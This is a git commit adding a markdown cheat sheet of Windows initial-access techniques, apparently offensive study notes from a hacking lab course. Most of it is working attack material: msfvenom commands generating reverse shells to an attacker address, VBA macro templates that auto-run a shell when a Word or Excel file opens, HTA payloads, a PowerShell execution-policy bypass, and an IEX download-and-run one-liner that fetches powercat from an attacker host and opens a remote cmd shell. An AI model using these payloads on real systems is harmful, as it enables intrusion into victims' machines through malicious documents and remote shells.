payload
This commit is contained in:
parent
9d24689b42
commit
c9f70905cf
|
@ -0,0 +1,92 @@
|
||||||
|
# Windows Scripting Host (WSH)
|
||||||
|
|
||||||
|
|
||||||
|
## Visual Basic Script (VB Script)
|
||||||
|
* `cscript file.exe`, command line scripts
|
||||||
|
* `wscript file.exe`, UI scripts
|
||||||
|
|
||||||
|
* Example (watch out for the whitespace after path, it has to be included)
|
||||||
|
```sh
|
||||||
|
Set shell = WScript.CreateObject("Wscript.Shell")
|
||||||
|
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
## Visual Basic for Application (VBA)
|
||||||
|
* Access Windows API via Macros
|
||||||
|
* Open Word, `view` --> `macros`, give a name and select document in `Macros in`
|
||||||
|
* Create reverse shell
|
||||||
|
```sh
|
||||||
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
|
||||||
|
```
|
||||||
|
* Insert into the following Macro Content, `Workbook_Open()` for excel, `Document_Open()` for Word macros
|
||||||
|
```sh
|
||||||
|
Sub Document_Open()
|
||||||
|
SHELL
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub AutoOpen()
|
||||||
|
SHELL
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub SHELL()
|
||||||
|
<reverse shell goes here>
|
||||||
|
End Sub
|
||||||
|
```
|
||||||
|
|
||||||
|
## HTML Application (HTA)
|
||||||
|
|
||||||
|
* HTML file including some kind of scripting language like JS, VB, ActiveX
|
||||||
|
* `mshta` is used to excecute
|
||||||
|
|
||||||
|
### POC
|
||||||
|
* Download file via attacker's web server
|
||||||
|
* File should look like
|
||||||
|
```HTML
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>
|
||||||
|
var shell= 'cmd.exe'
|
||||||
|
new ActiveXObject('WScript.Shell').Run(shell);
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
* Save Document in a macros supporting file format like `Word 97-2003 Template` and `Word 97-2003 Document`
|
||||||
|
|
||||||
|
|
||||||
|
### Reverse Shell
|
||||||
|
* Craft reverse shell via `msfvenom`
|
||||||
|
```sh
|
||||||
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
|
||||||
|
```
|
||||||
|
* `msfconsole` via
|
||||||
|
```sh
|
||||||
|
use exploit/windows/misc/hta_server
|
||||||
|
```
|
||||||
|
|
||||||
|
## Powershell
|
||||||
|
|
||||||
|
* Powershell execution policy can be checked via
|
||||||
|
```sh
|
||||||
|
Get-ExecutionPolicy
|
||||||
|
```
|
||||||
|
* Set policy via
|
||||||
|
```sh
|
||||||
|
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
|
||||||
|
```
|
||||||
|
* Bypass via
|
||||||
|
```sh
|
||||||
|
powershell -ex bypass -File shell.ps1
|
||||||
|
```
|
||||||
|
* Load [powercat](https://github.com/besimorhino/powercat.git) on attacker machine and load it on the target via
|
||||||
|
```sh
|
||||||
|
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
|
||||||
|
```
|
||||||
|
* Or use msfvenom
|
||||||
|
```sh
|
||||||
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in New Issue